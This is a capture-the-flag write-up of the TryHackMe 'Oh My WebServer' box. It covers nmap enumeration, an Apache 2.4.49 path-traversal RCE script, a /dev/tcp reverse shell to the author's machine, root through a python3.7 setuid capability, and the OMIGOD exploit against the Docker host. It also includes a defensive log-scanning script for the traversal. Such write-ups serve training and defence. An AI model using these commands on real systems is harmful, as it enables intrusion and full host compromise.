CTF : Oh My WebServer

CTF Oh My WebServer writeup. Source THM. Announced difficulty level: Medium

Posted by Boula-Bytes on 12 May 2022

CTF : Oh_My_WebServer

Information

  • IP: 10.10.65.235
  • MYIP: 10.8.98.126

First enumeration

Basics

  • NMAP

```console
sudo nmap -p22,80 -A 10.10.65.235
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-12 20:58 CEST
Nmap scan report for 10.10.65.235
Host is up (0.065s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 e0:d1:88:76:2a:93:79:d3:91:04:6d:25:16:0e:56:d4 (RSA)
|   256 91:18:5c:2c:5e:f8:99:3c:9a:1f:04:24:30:0e:aa:9b (ECDSA)
|_  256 d1:63:2a:36:dd:94:cf:3c:57:3e:8a:e8:85:00:ca:f6 (ED25519)
80/tcp open  http    Apache httpd 2.4.49 ((Unix))
|_http-server-header: Apache/2.4.49 (Unix)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: Consult - Business Consultancy Agency Template | Home
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Crestron XPanel control system (90%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.16 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), Linux 2.6.32 (86%), Linux 2.6.32 - 3.1 (86%), Linux 2.6.39 - 3.2 (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   37.48 ms 10.8.0.1
2   73.03 ms 10.10.65.235

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.69 seconds
```

Vulnerabilities search

In the assets directory I found a Mac .DS_Store file, but nothing interesting in it. The contact form calls a PHP page, but the file is missing...

So nothing to do with the site itself, but are there known exploits?

```console
$ searchsploit apache 2.4.49
[...]
Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) | multiple/webapps/50383.sh
[...]
```

Maybe this one could do the trick? Let's see...

```console
$ bash 50383.sh target.txt /bin/sh whoami
http://10.10.65.235
daemon
```

Hey! It seems to work!
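From the defender's side, the request that made this work is visible in the Apache access log. The following Python script is an added example, not part of the original writeup or of the exploit script: it scans constructed access-log lines (IPs, timestamps and paths are made up) and flags requests whose percent-decoded path climbs above the document root, which is the encoded-dot traversal shape of the Apache 2.4.49 bug.

```python
import re
from urllib.parse import unquote

# Constructed Apache access-log lines (IPs, times and paths are made up for this example).
# Lines 2 and 3 have the encoded-dot traversal shape of the Apache 2.4.49 bug.
SAMPLE_LOG = """\
10.8.98.126 - - [12/May/2022:21:03:11 +0200] "GET / HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.8.98.126 - - [12/May/2022:21:05:42 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 200 38 "-" "curl/7.81.0"
10.8.98.126 - - [12/May/2022:21:06:01 +0200] "GET /cgi-bin/.%%32%65/.%%32%65/etc/passwd HTTP/1.1" 200 1984 "-" "curl/7.81.0"
10.8.98.126 - - [12/May/2022:21:07:15 +0200] "GET /assets/css/style.css HTTP/1.1" 200 8810 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')

def fully_decode(path, max_rounds=3):
    """Percent-decode until the string stops changing (catches double encoding)."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def escapes_root(path):
    """True if the '..' segments of a decoded path climb above the document root."""
    depth = 0
    for seg in path.split("?", 1)[0].split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False

def find_traversal(log_text):
    """Return the logged requests whose fully decoded path escapes the web root."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        raw, decoded = m.group("path"), fully_decode(m.group("path"))
        if escapes_root(decoded):
            # raw != decoded: the dots were percent-encoded, which is exactly what
            # slipped past the path normalisation in 2.4.49.
            hits.append({"method": m.group("method"), "raw": raw,
                         "decoded": decoded, "encoded": raw != decoded})
    return hits
```

Calling `find_traversal(SAMPLE_LOG)` returns the two traversal requests with their decoded paths; on a real log, feed it the file contents and alert on any hit with `encoded` set.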

Exploit

So here we go!

On my box:

```console
$ pwncat -l 1234
```

```console
$ bash 50383.sh target.txt /bin/bash "/bin/bash -i >& /dev/tcp/10.8.98.126/1234 0>&1"
```

And we got a shell :)

```console
$ id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
```

Privilege escalation

Enumeration for privesc

OK, it seems we are in a Docker container... We need to escape from it or find a way into the host.

After a long time enumerating, I tried to get root and found this:

```console
$ getcap -r / 2>/dev/null
/usr/bin/python3.7 = cap_setuid+ep
```

So I used it to escalate to root inside the Docker container:

```console
$ /usr/bin/python3.7 -c 'import os; os.setuid(0); os.system("/bin/sh")'
```

Then we can read the flag in /root.

But we are still inside the Docker container. This container has the IP 172.17.0.2, so the host should be 172.17.0.1... maybe... let's see.

OK, there is no tool in the container to help me, so I looked for a static build of nmap.

Then I used pwncat to upload it.

```console
./nmap -p- 172.17.0.1
[...]
PORT     STATE  SERVICE
22/tcp   open   ssh
80/tcp   open   http
5985/tcp closed unknown
5986/tcp open   unknown
[...]
```

Let's find out what port TCP/5986 is. This port is used either for WinRM or for OMI. We assume the host is a Linux host, so it should be an OMI Linux agent. After some searching, there is CVE-2021-38647 (OMIGOD), which can lead to RCE.

Let's try.

On my box:

```console
$ wget https://raw.githubusercontent.com/horizon3ai/CVE-2021-38647/main/omigod.py
```

And then we upload it via pwncat.

Exploit

```console
$ python3.7 omigod.py --target 172.17.0.1 -c "cat /root/root.txt"
```

\o/